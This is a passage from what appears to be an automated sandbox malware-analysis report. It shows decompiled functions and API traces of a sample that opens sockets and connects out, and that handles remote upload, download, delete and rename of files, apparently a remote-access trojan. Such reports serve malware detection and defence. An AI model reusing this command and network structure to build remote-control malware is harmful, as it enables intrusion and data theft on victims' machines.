                                  • API String ID: 868658090-0
                                  • Opcode ID: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                  • Instruction ID: d9a2345f5f1697b642a9e7ab7bc87c8d23e46c7080ea0e2ac139fbaf6b3ea179
                                  • Opcode Fuzzy Hash: d890864cfad681b016a33312849ab50d27a828bdf9536b28ad934c6231dadfcb
                                  • Instruction Fuzzy Hash: 97D0123650011CBBCB007FE9EC098D97B68DB452A5740C465FE1587261EA729620D7D5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413E46, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: __dllonexit_onexit
                                  • String ID:
                                  • API String ID: 2384194067-0
                                  • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                  • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                  • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402038, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00402038(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr* _t9;

				_t9 = __ecx;
				if( *0x41b730 != 0) {
					L2:
					_push(6);
					_push(1);
					_push(0); // executed
					L0041418E(); // executed
					 *_t9 = _t6;
					if(_t6 != 0xffffffff) {
						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
						return _t6;
					} else {
						goto L3;
					}
				} else {
					_t6 = E00402074(); // executed
					if(_t6 == 0) {
						L3:
						return 0;
					} else {
						goto L2;
					}
				}
			}





                                  0x00402040
                                  0x00402042
                                  0x0040204d
                                  0x0040204d
                                  0x0040204f
                                  0x00402051
                                  0x00402053
                                  0x0040205b
                                  0x0040205d
                                  0x00402063
                                  0x00402067
                                  0x0040206b
                                  0x00402073
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402044
                                  0x00402044
                                  0x0040204b
                                  0x0040205f
                                  0x00402062
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040204b

                                  APIs
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 00402074: WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Startupsocket
                                  • String ID:
                                  • API String ID: 3996037109-0
                                  • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                  • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                  • Opcode Fuzzy Hash: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                  • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040209B, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 16%
                                  			E0040209B(intOrPtr* __ecx, void* _a4) {
				signed int _t3;

				_t1 = __ecx + 4; // 0x41be74
				_t3 = _t1;
				_push(0x10);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t3);
				_push( *__ecx);
				asm("movsd"); // executed
				L0041419A(); // executed
				asm("sbb al, al");
				return  ~_t3 + 1;
			}




                                  0x0040209f
                                  0x0040209f
                                  0x004020a8
                                  0x004020aa
                                  0x004020ab
                                  0x004020ac
                                  0x004020ad
                                  0x004020ae
                                  0x004020b0
                                  0x004020b1
                                  0x004020b8
                                  0x004020bf

                                  APIs
                                  • connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: connect
                                  • String ID:
                                  • API String ID: 1959786783-0
                                  • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                  • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                  • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                  • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402074, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00402074() {
				char _v404;
				signed int _t2;
				char _t4;

				_t2 =  &_v404;
				_push(_t2);
				_push(0x202); // executed
				L00414194(); // executed
				asm("sbb al, al");
				_t4 =  ~_t2 + 1;
				 *0x41b730 = _t4;
				return _t4;
			}






                                  0x0040207d
                                  0x00402083
                                  0x00402084
                                  0x00402089
                                  0x00402090
                                  0x00402092
                                  0x00402094
                                  0x0040209a

                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 00402089
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                  • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                  • Opcode Fuzzy Hash: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                  • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00403C4A, Relevance: 240.6, APIs: 121, Strings: 16, Instructions: 868fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403C60
                                  • SetEvent.KERNEL32(?), ref: 00403C69
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403C72
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00403C8A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00403C9B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403CAA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D11
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D27
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00403D5F
                                    • Part of subcall function 00403816: CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                    • Part of subcall function 00403816: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                    • Part of subcall function 00403816: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 00403D7A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DB1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403DD6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 00404199
                                  • atoi.MSVCRT ref: 004041A0
                                    • Part of subcall function 00403473: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(Function_0001B300,00415664,[INFO],[DEBUG],00000000,?,004041B5,?,?,00000000), ref: 00403499
                                    • Part of subcall function 00403473: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034AC
                                    • Part of subcall function 00403473: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034B5
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004034CE
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 004034DB
                                    • Part of subcall function 00403473: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004034F0
                                    • Part of subcall function 00403473: recv.WS2_32(00000000,?,0000FDE8,00000000), ref: 00403517
                                    • Part of subcall function 00403473: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,00000000,?,0000FDE8,00000000), ref: 00403534
                                    • Part of subcall function 00403473: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 00403541
                                    • Part of subcall function 00403473: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403556
                                    • Part of subcall function 00403473: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 00403560
                                    • Part of subcall function 00403473: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403578
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004041C3
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041E1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Downloaded file size: ,00000000,?,?,?,00000000), ref: 004041EE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                    • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                    • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                    • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                    • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                    • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                    • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                    • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                    • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                  • closesocket.WS2_32(?), ref: 0040433A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                  • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6B015DF8,00000001,00000000), ref: 00404489
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                  • _wrename.MSVCRT ref: 004044C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                    • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                    • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                    • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                    • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                    • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                  • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                  • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,6B015DF8,?,?,?,?,?,00000055), ref: 004046AC
                                  • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                    • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                    • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                    • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
